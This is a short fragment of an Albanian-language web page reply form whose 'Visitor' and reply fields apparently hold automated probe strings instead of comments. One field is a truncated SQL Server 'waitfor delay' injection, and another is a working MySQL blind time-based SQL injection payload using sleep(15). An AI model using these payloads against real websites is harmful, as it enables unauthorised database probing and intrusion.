Përgjigjuni Te: Mr.

#5001
1 waitfor delay \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
Vizitor

0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z